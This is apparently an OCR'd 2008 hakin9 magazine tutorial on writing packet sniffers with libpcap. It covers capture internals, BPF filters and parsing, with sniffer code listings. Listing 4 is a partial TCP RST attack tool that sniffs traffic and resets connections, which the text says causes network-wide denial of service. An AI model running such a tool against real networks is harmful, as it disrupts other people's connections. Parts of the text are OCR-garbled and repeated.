This document discusses packet capture and the libpcap library. It begins by explaining how packet capture works at a low level, intercepting traffic on the network card and copying it to kernel memory. It then introduces libpcap, an open source library that provides a portable interface for packet capture across operating systems. The document provides code examples for opening a network interface with libpcap, capturing packets, and processing them with a simple callback function. It aims to demonstrate the basic principles and steps for writing a packet sniffing application using libpcap.
This document discusses packet capture and the libpcap library. It begins by explaining how packet capture works at a low level, intercepting traffic on the network card and copying it to kernel memory. It then introduces libpcap, an open source library that provides a portable interface for packet capture across operating systems. The document provides code examples for opening a network interface with libpcap, capturing packets, and processing them with a simple callback function. It aims to demonstrate the basic principles and steps for writing a packet sniffing application using libpcap.
This document discusses packet capture and the libpcap library. It begins by explaining how packet capture works at a low level, intercepting traffic on the network card and copying it to kernel memory. It then introduces libpcap, an open source library that provides a portable interface for packet capture across operating systems. The document provides code examples for opening a network interface with libpcap, capturing packets, and processing them with a simple callback function. It aims to demonstrate the basic principles and steps for writing a packet sniffing application using libpcap.
This document discusses packet capture and the libpcap library. It begins by explaining how packet capture works at a low level, intercepting traffic on the network card and copying it to kernel memory. It then introduces libpcap, an open source library that provides a portable interface for packet capture across operating systems. The document provides code examples for opening a network interface with libpcap, capturing packets, and processing them with a simple callback function. It aims to demonstrate the basic principles and steps for writing a packet sniffing application using libpcap.
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N owadays, computer networks are usu- ally large and diverse systems that communicate using a wide variety of protocols. This complexity created the need for more sophisticated tools to monitor and troubleshoot network traffc. Today, one of the critical tools in any network administrator tool- box is the sniffer. Sniffers, also known as packet analyzers, are programs that have the ability to intercept the traffc that passes over a network. They are very popular between network administrators and the black hat community because they can be used for both good and evil. n this article we will go through main principles of packet capture and introduce libpcap, an open source and portable packet capture library which is the core of tools like tcpdump, dsniff, kismet, snort or ettercap. Packet Capture Packet capture is the action of collecting data as it travels over a network. Sniffers are the best example of packet capture systems but many other types of applications need to grab packets off a network card. Those include network statistical tools, intrusion detection systems, port knocking daemons, password sniffers, ARP poisoners, tracerouters, etc. First of all let's review how packet capture works in Ethernet-based networks. Every time a network card receives an Ethernet frame it checks that its destination MAC address matches its own. f it does, it generates an inter- rupt request. The routine in charge of handling the interrupt is the system's network card driver. The driver timestamps received data and cop- Programming with Libpcap - Snifng the Network From Our Own AppIication Luis Martin Garcia DifcuIty Since the rst message was sent over the ARPANET in 1969, computer networks have changed a great deaI. Back then, networks were smaII and probIems were soIved using simpIe diagnostic tooIs. As these networks got more compIex, the need for management and troubIeshooting increased. What you wiII Iearn... The principles of packet capture How to capture packets using libpcap Aspects to consider when writing a packet cap- ture application What you shouId know... The C programming language The basics of networking and the OS Refer- ence Model How common protocols like Ethernet, TCP/P or ARP work Attack Programming with Libpcap 39 hakin9 2/2008 ies it from the card buffer to a block of memory in kernel space. Then, it determines which type of packet has been received looking at the ether- type feld of the Ethernet header and passes it to the appropriate protocol handler in the protocol stack. n most cases the frame will contain an Pv4 datagram so the Pv4 packet handler will be called. This handler performs a number of check to ensure, for example, that the packet is not cor- rupt and that is actually destined for this host. f all tests are passed, the P headers are removed and the remainder is passed to the next protocol handler (probably TCP or UDP). This process is repeated until the data gets to the application layer where it is processed by the user- level application. When we use a sniffer, packets go through the same process de- scribed above but with one differ- ence: the network driver also sends a copy of any received or transmitted packet to a part of the kernel called the packet flter. Packet flters are what makes packet capture pos- sible. By default they let any packet through but, as we will see later, they usually offer advanced fltering capabilities. As packet capture may involve security risks, most systems require administrator privileges in order to use this feature. Figure 1 illustrates the capture process. Libpcap Libpcap is an open source library that provides a high level interface to net- work packet capture systems. t was created in 1994 by McCanne, Leres and Jacobson researchers at the Lawrence Berkeley National Labora- tory from the University of California at Berkeley as part of a research project to investigate and improve TCP and nternet gateway performance. Libpcap authors' main objective was to create a platform-independ- ent AP to eliminate the need for system-dependent packet capture modules in each application, as vir- tually every OS vendor implements its own capture mechanisms. The libpcap AP is designed to be used from C and C++. However, there are many wrappers that allow its use from languages like Perl, Python, Java, C# or Ruby. Libpcap runs on most UNX-like operating systems (Linux, Solaris, BSD, HP- UX...). There is also a Windows ver- sion named Winpcap. Today, libpcap is maintained by the Tcpdump Group. Full documentation and source code is available from the tcpdump's offcial site at (http: // for Winpcap) Our First Steps With Libpcap Now that we know the basics of packet capture let us write our own sniffng application. The frst thing we need is a net- work interface to listen on. We can either specify one explicitly or let libpcap get one for us. The function char *pcap _ lookupdev(char *errbuf) returns a pointer to a string contain- ing the name of the frst network device that is suitable for packet cap- ture. Usually this function is called when end-users do not specify any network interface. t is generally a bad idea to use hard coded inter- face names as they are usually not portable across platforms. Figure 1. Elements involved in the capture process Packets Packet Filter Proctocol Stack NETWORK CARD CARD DRVER Hardware Kernel Space User Space Received Packet Transmitted Packet Sniffer Network Monitor Web Browser FTP Server Attack 40 hakin9 2/2008 The errbuf argument of pcap _ lookupdev() is a user supplied buffer that the library uses to store an error message in case something goes wrong. Many of the functions imple- mented by libpcap take this param- eter. When allocating the buffer we have to be careful because it must be able to hold at least PCAP _ ERRBUF _ SIZE bytes (currently defned as 256). Once we have the name of the network device we have to open it. The function pcap _ t *pcap _ open _ live(const char *device, int snaplen, int promisc, int to _ ms, char *errbuf) does that. t returns an interface handler of type pcap _ t that will be used later when calling the rest of the functions provided by libpcap. The frst argument of pcap _ open _ live() is a string containing the name of the network interface we want to open. The second one is the maximum number of bytes to capture. Setting a low value for this parameter might be useful in case we are only interested in grabbing headers or when programming for embedded systems with important memory limitations. Typically the maximum Ethernet frame size is 1518 bytes. However, other link types like FDD or 802.11 have big- ger limits. A value of 65535 should be enough to hold any packet from any network. The option to _ ms defnes how many milliseconds should the kernel wait before copying the captured information from kernel space to user space. Changes of context are computationally expensive. f we are capturing a high volume of network traffc it is better to let the kernel group some packets before cross- ing the kernel-userspace bound- ary. A value of zero will cause the read operations to wait forever until enough packets arrived to the net- work interface. Libpcap documenta- tion does not provide any suggestion for this value. To have an idea we can examine what other sniffers do. Tcpdump uses a value of 1000, dsniff uses 512 and ettercap distinguishes between different operating systems using 0 for Linux or OpenBSD and 10 for the rest. The promisc fag decides wheth- er the network interface should be put into promiscuous mode or not. That is, whether the network card should accept packets that are not destined to it or not. Specify 0 for non-promiscuous and any other value for promiscuous mode. Note that even if we tell libpcap to listen Listing 1. Structure pcap_pkthdr struct pcap_pkthdr { struct timeval ts; /* Timestamp of capture */ bpf_u_int32 caplen; /* Number of bytes that were stored */ bpf_u_int32 len; /* Total length of the packet */ }; Listing 2. Simple sniffer /* Simple Sniffer */ /* To compile: gcc simplesniffer.c -o simplesniffer -lpcap */ #include <pcap.h> #include <string.h> #include <stdlib.h> #dehne MAXBYTES2CAPTURE 2048 void processPacket(u_char *arg, const struct pcap_pkthdr* pkthdr, const u_char * packet){ int i=0, *counter = (int *)arg; printf("Packet Count: %d\n", ++(*counter)); printf("Received Packet Size: %d\n", pkthdr->len); printf("Payload:\n"); for (i=0; i<pkthdr->len; i++){ if ( isprint(packet[i]) ) printf("%c ", packet[i]); else printf(". ");
int i=0, count=0; pcap_t *descr = NULL; char errbuf[PCAP_ERRBUF_SIZE], *device=NULL; memset(errbuf,0,PCAP_ERRBUF_SIZE); /* Get the name of the Hrst device suitable for capture */ device = pcap_lookupdev(errbuf); printf("Opening device %s\n", device);
/* Open device in promiscuous mode */ descr = pcap_open_live(device, MAXBYTES2CAPTURE, 1, 512, errbuf); /* Loop forever & call processPacket() for every received packet*/ pcap_loop(descr, -1, processPacket, (u_char *)&count); return 0; } Attack 42 hakin9 2/2008 in non-promiscuous mode, if the interface was already in promiscu- ous mode it may stay that way. We should not take for granted that we will not receive traffc destined for other hosts, instead, it is better to use the fltering capabilities that lib- pcap provides, as we will see later. Once we have a network inter- face open for packet capture, we have to actually tell pcap that we want to start getting packets. For this we have some options: The function const u _ char *pcap _ next(pcap _ t *p, struct pcap _ pkthdr *h) takes the pcap _ t handler returned by pcap _ open _ live, a pointer to a structure of type pcap _ pkthdr and returns the frst packet that arrives to the network interface. The function int pcap _ loop(pcap _ t *p, int cnt, pcap _ handler callback, u _ char *user) is used to collect packets and process them. t will not re- turn until cnt packets have been captured. A negative cnt value will cause pcap _ loop() to return only in case of error. You are probably wondering if the function only returns an integer, where are the packets that were captured? The answer is a bit tricky. pcap _ loop() does not return those packets, instead, it calls a user-defned function every time there is a packet ready to be read. This way we can do our own process- ing in a separate function instead of calling pcap _ next() in a loop and process everything inside. However there is a problem. f pcap _ loop() calls our function, how can we pass ar- guments to it? Do we have to use ugly globals? The answer is no, the libpcap guys thought about this problem and included a way to pass information to the callback function. This is the user argument. This pointer is passed in every call. The pointer is of type u _ char so we will have to cast it for our own needs when calling pcap _ loop() and when using it inside the callback function. Our packet processing func- tion must have a specifc prototype, otherwise pcap _ loop() wouldn't know how to use it. This is the way it should be declared: void function_name(u_char *userarg, const struct pcap_pkthdr* pkthdr, const u_ char * packet); The frst argument is the user pointer that we passed to pcap _ loop(), the second one is a pointer to a structure that contains information about the captured packet. Listing 1 shows the defnition of this structure. The caplen member has usually the same value as len except the situation when the size of the cap- tured packet exceeds the snaplen specifed in open _ pcap _ live(). The third alternative is to use int pcap _ dispatch(pcap _ t *p, int cnt, pcap _ handler callback, u _ char *user), which is similar to pcap _ loop() but it also returns when the to _ ms timeout specifed in pcap _ open _ live() elapses. Listing 1 provides an example of a simple sniffer that prints the raw data that it captures. Note that header fle pcap.h must be included. Error checks have been omitted for clarity. Once We Capture a Packet When a packet is captured, the only thing that our application has got is a bunch of bytes. Usually, the net- work card driver and the protocol stack process that data for us but when we are capturing packets from our own application we do it at the lowest level so we are the ones in charge of making the data rational. To do that there are some things that should be taken into account. Data Link Type Although Ethernet seems to be present everywhere, there are a lot of different technologies and standards that operate at the data link layer. n order to be able to decode packets captured from a network interface we must know the underlying data link type so we are able to interpret the headers used in that layer. The function int pcap _ datalink(pcap _ t *p) returns the link layer type of the device opened by pcap _ open _ live(). Libpcap is able to distinguish over 180 different link Figure 3. Data encapsulation in Ethernet networks using the TCP/IP protocol P HEADER TCP HEADER PAYLOAD ETHERNET HEADER ETHERNET CHECKSUM Figure 2. Normal program fow of a pcap application nitialize Network nterface Set Filter Capture Packet Exit Process Packet Close nterface Capture Loop Programming with Libpcap 43 hakin9 2/2008 types. However, it is the responsibil- ity of the user to know the specifc details of any particular technology. This means that we, as program- mers, must know the exact format of the data link headers that the cap- tured packets will have. n most ap- plications we would just want to know the length of the header so we know where the P datagram starts. Table 1 summarizes the most common data link types, their names in libpcap and the offsets that should be applied to the start of the captured data to get the next protocol header. Probably the best way to handle the different link layer header sizes is to implement a function that takes a pcap _ t structure and returns the offset that should be used to get the network layer headers. Dsniff takes this approach. Have a look at func- tion pcap _ dloff() in fle pcap _ util.c from the Dsniff source code. Network Layer ProtocoI The next step is to determine what follows the data link layer header. From now on we will assume that we are working with Ethernet networks. The Ethernet header has a 16-bit feld named ethertype which speci- fes the protocol that comes next. Ta- ble 2 lists the most popular network layer protocols and their ethertype value. When testing this value we must remember that it is received in network byte order so we will have to convert it to our host's ordering scheme using the function ntohs(). Transport Layer ProtocoI Once we know which network layer protocol was used to route our cap- tured packet we have to fnd out which protocol comes next. Assum- ing that the captured packet has an P datagram knowing the next protocol is easy, a quick look at the protocol feld of the Pv4 header (in Pv6 is called next header) will tell us. Table 3 summarizes the most common transport layer protocols, their hexadecimal value and the RFC document in which they are defned. A complete list can be found at protocol-numbers. AppIication Layer ProtocoI Ok, so we have got the Ethernet header, the P header, the TCP header and now what?. Application layer protocols are a bit harder to distinguish. The TCP header does not provide any information about the payload it transports but TCP port numbers can give as a clue. f, for example, we capture a packet that is targeted to or comes from port 80 and it is payload is plain ASC text, it will probably be some kind of HTTP traffc between a web browser and a web server. However, this is not exact science so we have to be very care- ful when handling the TCP payload, it may contain unexpected data. MaIformed Packets n Louis Amstrong's wonderful world everything is beautiful and perfect TabIe 3. Transport layer protocols ProtocoI VaIue RFC nternet Control Message Protocol (CMP) 0x01 RFC 792 nternet Group Management Protocol (GMP) 0x02 RFC 3376 Transmission Control Protocol (TCP) 0x06 RFC: 793 Exterior Gateway Protocol 0x08 RFC 888 User Datagram Protocol (UDP) 0x11 RFC 768 Pv6 Routing Header 0x2B RFC 1883 Pv6 Fragment Header 0x2C RFC 1883 CMP for Pv6 0x3A RFC 1883 TabIe 2. Network layer protocols and ethertype values Network Layer ProtocoI Ethertype VaIue nternet Protocol Version 4 (Pv4) 0x0800 nternet Protocol Version 6 (Pv6) 0x86DD Address Resolution Protocol (ARP) 0x0806 Reverse Address Resolution Protocol (RARP) 0x8035 AppleTalk over Ethernet (EtherTalk) 0x809B Point-to-Point Protocol (PPP) 0x880B PPPoE Discovery Stage 0x8863 PPPoE Session Stage 0x8864 Simple Network Management Protocol (SNMP) 0x814C TabIe 1. Common data link types Data Link Type Pcap AIias Offset (in bytes) Ethernet 10/100/1000 Mbs DLT_EN10MB 14 Wi-Fi 802.11 DLT_IEEE802_11 22 FDD( Fiber Distributed Data nterface) DLT_FFDI 21 PPPoE (PPP over Ethernet) DLT_PPP_ETHER 14 (Ethernet) + 6 (PPP) = 20 BSD Loopback DLT_NULL 4 Point to Point (Dial-up) DLT_PPP Attack 44 hakin9 2/2008 but sniffers usually live in hell. Net- works do not always carry valid pack- ets. Sometimes packets may not be crafted according to the standards or may get corrupted in their way. These situations must be taken into account when designing an applica- tion that handles sniffed traffc. The fact that an ethertype value says that the next header is of type ARP does not mean we will actually fnd an ARP header. n the same way, we cannot blindly trust the protocol feld of an P datagram to contain the correct value for the following header. Not even the felds that specify lengths can be trusted. f we want to design a powerful packet analyzer, avoiding segmentation faults and headaches, every detail must be checked. Here are a few tips: Check the whole size of the re- ceived packet. f, for example, we are expecting an ARP packet on an Ethernet network, packets with a length different than 14 + 28 = 42 bytes should be discard- ed. Failing to check the length of a packet may result in a noisy segmentation fault when trying to access the received data. Check P and TCP checksums. f checksums are not valid then the data contained in the head- ers may be garbage. However, Listing 3. Simple ARP sniffer /* Simple ARP Sniffer. */ /* To compile: gcc arpsniffer.c -o arpsniff -lpcap */ /* Run as root! */ #include <pcap.h> #include <stdlib.h> #include <string.h> /* ARP Header, (assuming Ethernet+IPv4) */ #dehne ARP_REQUEST 1 /* ARP Request */ #dehne ARP_REPLY 2 /* ARP Reply */ typedef struct arphdr { u_int16_t htype; /* Hardware Type */ u_int16_t ptype; /* Protocol Type */ u_char hlen; /* Hardware Address Length */ u_char plen; /* Protocol Address Length */ u_int16_t oper; /* Operation Code */ u_char sha[6]; /* Sender hardware address */ u_char spa[4]; /* Sender IP address */ u_char tha[6]; /* Target hardware address */ u_char tpa[4]; /* Target IP address */ }arphdr_t; #dehne MAXBYTES2CAPTURE 2048 int main(int argc, char *argv[]){ int i=0; bpf_u_int32 netaddr=0, mask=0; /* To Store network address and netmask */ struct bpf_program hlter; /* Place to store the BPF Hlter program */ char errbuf[PCAP_ERRBUF_SIZE]; /* Error buffer */ pcap_t *descr = NULL; /* Network interface handler */ struct pcap_pkthdr pkthdr; /* Packet information (timestamp,size...)*/ const unsigned char *packet=NULL;/* Received raw data */ arphdr_t *arpheader = NULL; /* Pointer to the ARP header */ memset(errbuf,0,PCAP_ERRBUF_SIZE); if (argc != 2){ printf("USAGE: arpsniffer <interface>\n"); exit(1); } /* Open network device for packet capture */ descr = pcap_open_live(argv[1], MAXBYTES2CAPTURE, 0, 512, errbuf); /* Look up info from the capture device. */ pcap_lookupnet( argv[1] , &netaddr, &mask, errbuf); /* Compiles the Hlter expression into a BPF Hlter program */ pcap_compile(descr, &hlter, "arp", 1, mask);
/* Load the Hlter program into the packet capture device. */ pcap_sethlter(descr,&hlter); while(1){
/* If is Ethernet and IPv4, print packet contents */ if (ntohs(arpheader->htype) == 1 && ntohs(arpheader- >ptype) == 0x0800){ printf("Sender MAC: "); for(i=0; i<6;i++)printf("%02X:", arpheader->sha[i]); printf("\nSender IP: "); for(i=0; i<4;i++)printf("%d.", arpheader->spa[i]); printf("\nTarget MAC: "); for(i=0; i<6;i++)printf("%02X:", arpheader->tha[i]); printf("\nTarget IP: "); for(i=0; i<4; i++)printf("%d.", arpheader->tpa[i]); printf("\n"); } } return 0; } Programming with Libpcap 45 hakin9 2/2008 the fact that checksums are cor- rect does not guarantee that the packet contains valid header values. Check encoding. HTTP or SMTP are text oriented protocols while Ethernet or TCP/P use binary fo rmat. Check whether you have what you expect. Any data extracted from a packet for later use should be validated. For example, f the payload of a packet is supposed to contain an P address, checks should be made to ensure that the data actually represents a valid Pv4 address. FiItering Packets As we saw before, the capture proc- ess takes place in the kernel while our application runs at user level. When the kernel gets a packet from the network interface it has to copy it from kernel space to user space, consuming a signifcant amount of CPU time. Capturing everything that fows past the network card could easily degrade the overall perform- ance of our host and cause the ker- nel to drop packets. f we really need to capture all traffc, then there is little we can do to optimize the capture process, but if we are only interested in a specifc type of packets we can tell the kernel to flter the incoming traffc so we just get a copy of the packets that match a flter expression. The part of the Listing 4. TCP RST Attack tool /* Simple TCP RST Attack tool */ /* To compile: gcc tcp_resetter.c -o tcpresetter -lpcap */ #dehne __USE_BSD /* Using BSD IP header */ #include <netinet/ip.h> /* Internet Protocol */ #dehne __FAVOR_BSD /* Using BSD TCP header */ #include <netinet/tcp.h> /* Transmission Control Protocol */ #include <pcap.h> /* Libpcap */ #include <string.h> /* String operations */ #include <stdlib.h> /* Standard library deHnitions */ #dehne MAXBYTES2CAPTURE 2048 int TCP_RST_send(tcp_seq seq, tcp_seq ack, unsigned long src_ip, unsigned long dst_ip, u_short src_prt, u_short dst_prt, u_short win){ /* This function crafts a custom TCP/IP packet with the RST Hag set and sends it through a raw socket. Check for the full example. */ /* [...] */ return 0; } int main(int argc, char *argv[] ){ int count=0; bpf_u_int32 netaddr=0, mask=0; pcap_t *descr = NULL; struct bpf_program hlter; struct ip *iphdr = NULL; struct tcphdr *tcphdr = NULL; struct pcap_pkthdr pkthdr; const unsigned char *packet=NULL; char errbuf[PCAP_ERRBUF_SIZE]; memset(errbuf,0,PCAP_ERRBUF_SIZE); if (argc != 2){ printf("USAGE: tcpsyndos <interface>\n"); exit(1); } /* Open network device for packet capture */ descr = pcap_open_live(argv[1], MAXBYTES2CAPTURE, 1, 512, errbuf); /* Look up info from the capture device. */ pcap_lookupnet( argv[1] , &netaddr, &mask, errbuf); /* Compiles the Hlter expression: Packets with ACK or PSH-ACK Hags set */ pcap_compile(descr, &hlter, "(tcp[13] == 0x10) or (tcp[13] == 0x18)", 1, mask);
/* Load the Hlter program into the packet capture device. */ pcap_sethlter(descr,&hlter); while(1){ packet = pcap_next(descr,&pkthdr); iphdr = (struct ip *)(packet+14); /* Assuming is Ethernet! */ tcphdr = (struct tcphdr *)(packet+14+20); /* Assuming no IP options! */ printf("+---------------------------------------+\n"); printf("Received Packet %d:\n", ++count); printf("ACK: %u\n", ntohl(tcphdr->th_ack) ); printf("SEQ: %u\n", ntohl(tcphdr->th_seq) ); printf("DST IP: %s\n", inet_ntoa(iphdr->ip_dst)); printf("SRC IP: %s\n", inet_ntoa(iphdr->ip_src)); printf("SRC PORT: %d\n", ntohs(tcphdr->th_sport) ); printf("DST PORT: %d\n", ntohs(tcphdr->th_dport) ); printf("\n"); TCP_RST_send(tcphdr->th_ack, 0, iphdr->ip_dst.s_addr, iphdr->ip_src.s_addr, tcphdr->th_dport, tcphdr->th_sport, 0); } return 0; } Attack 46 hakin9 2/2008 kernel that provides this functionality is the system's packet flter. A packet flter is basically a user defned routine that is called by the network card driver for every packet that it gets. f the routine validates the packet, it is delivered to our ap- plication, otherwise it is only passed to the protocol stack for the usual processing. Every operating system imple- ments its own packet fltering mecha- nisms. However, many of them are based on the same architecture, the BSD Packet Filter or BPF. Libpcap provides complete support for BPF based packet flters. This includes platforms like *BSD, AX, Tru64, Mac OS or Linux. On systems that do not accept BPF flters, libpcap is not able to provide kernel level flter- ing but it is still capable of selecting traffc by reading all the packets and evaluating the BPF flters in user-space, inside the library. This involves considerable computational overhead but it provides unmatched portability. Setting a FiIter Setting a flter involves three steps: constructing the flter expression, compiling the expression into a BPF program and fnally applying the flter. BPF programs are written in a special language similar to assem- bly. However, libpcap and tcpdump implement a high level language that lets us defne flters in a much easier way. The specifc syntax of this language is out of the scope of this article. The full specifcation can be found in the manual page for tcpdump. Here are some ex- amples: src host returns packets whose source P ad- dress is, dst port 80 returns packets whose TCP/UDP destination port is 80, not tcp Returns any packet that does not use the TCP protocol, tcp[13] == 0x02 and (dst port 22 or dst port 23) returns TCP packets with the SYN fag set and whose destination port is either 22 or 23, icmp[icmptype] == icmp-echoreply or icmp[icmptype] == icmp-echo returns CMP ping requests and replies, ether dst 00:e0:09:c1:0e:82 returns Ethernet frames whose destination MAC address match- es 00:e0:09:c1:0e:82, ip[8]==5 returns packets whose P TTL value equals 5. Once we have the flter expression we have to translate it into some- thing the kernel can understand, a BPF program. The function int pcap _ compile(pcap _ t *p, struct bpf _ program *fp, char *str, int optimize, bpf _ u _ int32 netmask) compiles the flter expression pointed by str into BPF code. The argument fp is a pointer to a struc- ture of type struct bpf _ program that we should declare before the call to pcap _ compile(). The optimize fag controls whether the flter program should be optimized for effciency or not. The last argument is the net- mask of the network on which pack- ets will be captured. Unless we want to test for broadcast addresses the netmask parameter can be safely set to zero. However, if we need to determine the network mask, the function int pcap _ lookupnet(const char *device, bpf _ u _ int32 *netp, bpf _ u _ int32 *maskp, char *errbuf) will do it for us. Once we have a compiled BPF program we have to insert it into the kernel calling the function int pcap _ sethlter(pcap _ t *p, struct bpf _ program *fp). f everything goes well we can call pcap _ loop() or pcap _ next() and start grab- bing packets. Listing 3 shows an example of a simple application that captures ARP traffc. Listing 4 shows a bit more advanced tool that listens for TCP packets with the ACK or PSH-ACK fags set and resets the connection, resulting in a denial of service for everyone in the network. Error checks and some portions of code have been omit- ted for clarity. Full examples can be found in http://programming- ConcIusion n this article we have explored the basics of packet capture and learned how to implement simple sniffng applications using the pcap library. However, libpcap offers additional functionality that has not been cov- ered here (dumping packets to cap- ture fles, injecting packets, getting statistics, etc). Full documentation and some tutorials can be found in the pcap man page or at tcpdump's offcial site. z On the 'Net tcpdump and libpcap offcial site, list of tools based on libpcap, the journey of a packet through the Linux network stack, paper about the BPF flter written by the original authors of libpcap, a tutorial on libpcap flter expressions. About the Author Luis Martin Garcia is a graduate in Computer Science from the University of Salaman- ca, Spain, and is currently pursuing his Master's degree in nformation Security. He is also the creator of Aldaba, an open source Port Knocking and Single Packet Authoriza- tion system for GNU/Linux, available at